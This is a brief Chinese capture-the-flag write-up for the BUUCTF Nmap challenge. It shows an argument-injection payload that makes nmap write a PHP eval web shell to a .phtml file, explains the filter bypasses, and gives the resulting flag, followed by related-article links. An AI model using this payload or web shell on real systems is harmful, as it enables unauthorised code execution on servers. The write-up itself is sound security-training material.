BUUCTF [网鼎杯 2020 朱雀组]Nmap

payload：127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

nmap 
`-oG`:将扫描结果输出到一个文本文件中，G代表生成一种称为"grepable output"（可用于grep命令的输出）的格式，这种格式是一种易于处理的文本格式。

写入`hack.phtml`而不是`hack.php`的原因在于php可能被过滤了
`<?php`也可以换成短标签`<?=`

最后用蚁剑连接，得到flag{04630fdb-7b7d-4282-a334-b35954b56c1d}

参考链接：
https://blog.csdn.net/weixin_44037296/article/details/110893526
https://www.cnblogs.com/AikN/p/15727575.html
https://www.cnblogs.com/Sentry-fei/p/15671032.html

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• BUUCTF-Crypto详细Writeup

朱雀 BUUCTF 2020 Nmap朱雀buuctf 2020 nmap 朱雀2020 nmap 朱雀phpweb 2020 朱雀think 2020 java buuctf-re buuctf easyre 2020 bsidescf buuctf 2020 had buuctf bjdctf loves 2020 朴实无华wustctf buuctf 2020 ezinclude buuctf npuctf 2020 青龙areuserialz buuctf 2020